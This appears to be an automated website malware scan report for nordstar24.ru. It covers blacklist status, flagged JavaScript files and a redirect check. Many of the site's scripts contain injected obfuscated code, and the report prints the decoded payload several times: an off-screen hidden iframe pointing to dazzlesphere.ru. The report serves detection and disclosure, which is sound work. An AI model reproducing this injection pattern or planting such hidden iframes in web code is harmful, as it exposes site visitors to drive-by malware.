Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nordstar24.ru
Result: This site is not currently listed as suspicious. Note that this reflects only Google's blacklist status at query time; the page scan below still flags several scripts on the site as malicious.
Query: http://yandex.com/infected?l10n=en&url=http://nordstar24.ru/
Result: The website is marked by Yandex as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nordstar24.ru/ | 200 OK Content-Length: 37600 Content-Type: text/html | clean |
http://nordstar24.ru/media/system/js/caption.js | 200 OK Content-Length: 3809 Content-Type: application/javascript | clean |
http://nordstar24.ru/modules/mod_s5_live_search/js/s5_ls_fade.js | 200 OK Content-Length: 6027 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' result = result.replace(/[\n\r]/g,""); result = eval('('+result+')'); } if(ths.callback) ths.callback(result); } else { if(ths.error) ths.error(http.status); } } } this.http.send(null); }, init : function() {this.http = this.getHTTPObject();} } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/modules/mod_s5_box/js/jquery.min.js | 200 OK Content-Length: 59140 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' Antivirus reports:
| ||
http://nordstar24.ru/modules/mod_s5_box/js/jquery.no.conflict.js | 200 OK Content-Length: 1866 Content-Type: application/javascript | suspicious |
Suspicious code: the script contains an iframe. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[1430 bytes skipped]... Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Note: the decoded iframe is absolutely positioned at left/top -1300px, which places it outside the visible page, and the same decoded iframe is reported for several other flagged scripts in this table. | ||
http://nordstar24.ru/modules/mod_s5_box/js/jquery.colorbox.js | 200 OK Content-Length: 20707 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' publicMethod.next = next; publicMethod.prev = prev; publicMethod.close = close; publicMethod.load = load; publicMethod.position = position; publicMethod.dimensions = dimensions; publicMethod.element = function(){ return element; }; publicMethod.settings = defaults; $(function () { init(); }); }(jQuery)); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/multibox/overlay.js | 200 OK Content-Length: 4352 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' top: myCoords.top+'px', height: myCoords.height+'px', left: myCoords.left+'px', width: myCoords.width+'px' }); } }, show: function(){ this.fade.start(0,this.options.opacity); }, hide: function(){ this.fade.start(this.options.opacity,0); } }); Overlay.implement(new Options); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/multibox/multibox.js | 200 OK Content-Length: 14036 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' src: this.contentObj.url, frameborder: 0, scrolling: 'auto' }).injectInside(this.contentContainer); }else if(this.type == 'htmlelement'){ this.elementContent.clone().setStyle('display','block').injectInside(this.contentContainer); }else if(this.type == 'ajax'){ new Ajax(this.contentObj.url, { method: 'get', update: 'MultiBoxContentContainer', evalScripts: true, autoCancel: true }) Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/multibox/AC_RunActiveContent.js | 200 OK Content-Length: 9875 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/jquery13.js | 200 OK Content-Length: 118724 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' document.body["scroll" + name], document.documentElement["scroll" + name], document.body["offset" + name], document.documentElement["offset" + name] ) : size === undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, typeof size === "string" ? size : size + "px" ); }; });})(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/jquery_no_conflict.js | 200 OK Content-Length: 1866 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[1430 bytes skipped]... Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://nordstar24.ru/modules/mod_maaslide/jquery2.js | 200 OK Content-Length: 117240 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' l.fn("[pattern]",function(b){var a=new RegExp("^"+b.attr("pattern")+"$");return a.test(b.val())});c.fn.validator=function(b){if(this.data("validator"))return this;b=c.extend(true,{},l.conf,b);return this.each(function(){var a=new w(c(this),b);c(this).data("validator",a)})}})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/s5_menu_active_and_parent_links.js | 200 OK Content-Length: 2933 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' if (s5_fm_li3[z3].innerHTML.indexOf("<UL") > 0 || s5_fm_li3[z3].innerHTML.indexOf("<ul") > 0) { if (s5_fm_li3[z3].className == "active") { s5_fm_li3[z3].className = "active s5_level_one_parent"; } else if (s5_fm_li3[z3].className != "active") { s5_fm_li3[z3].className = "s5_level_one_parent"; } } } };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/modules/mod_s5_box/js/s5_box_hide_div.js | 200 OK Content-Length: 2215 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' } }; })(); var s5_box_hide_div = document.getElementsByTagName("DIV"); for (var s5_box_hide_div_y=0; s5_box_hide_div_y<s5_box_hide_div.length; s5_box_hide_div_y++) { s5_box_hide_div_holder = s5_box_hide_div[s5_box_hide_div_y].className; if (s5_box_hide_div_holder.indexOf("-s5_box") > 0) { s5_box_hide_div[s5_box_hide_div_y].style.display = "none"; } };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/s5_textmenu.js | 200 OK Content-Length: 3235 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' } if (document.getElementById("s5_tm_8")) { document.getElementById("s5_tm_8").innerHTML = s5_text_menu_8; } if (document.getElementById("s5_tm_9")) { document.getElementById("s5_tm_9").innerHTML = s5_text_menu_9; } if (document.getElementById("s5_tm_10")) { document.getElementById("s5_tm_10").innerHTML = s5_text_menu_10; } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nordstar24.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Sep 2014 08:02:25 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=windows-1251;
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: nordstar24.ru
Referer: http://www.google.com/search?q=nordstar24.ru
Result:
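The result is similar to the first query. No suspicious redirects were found. This check covers server-side redirects only; the iframe injection reported under "Scanned pages/files" happens in the visitor's browser and would not show up as an HTTP redirect.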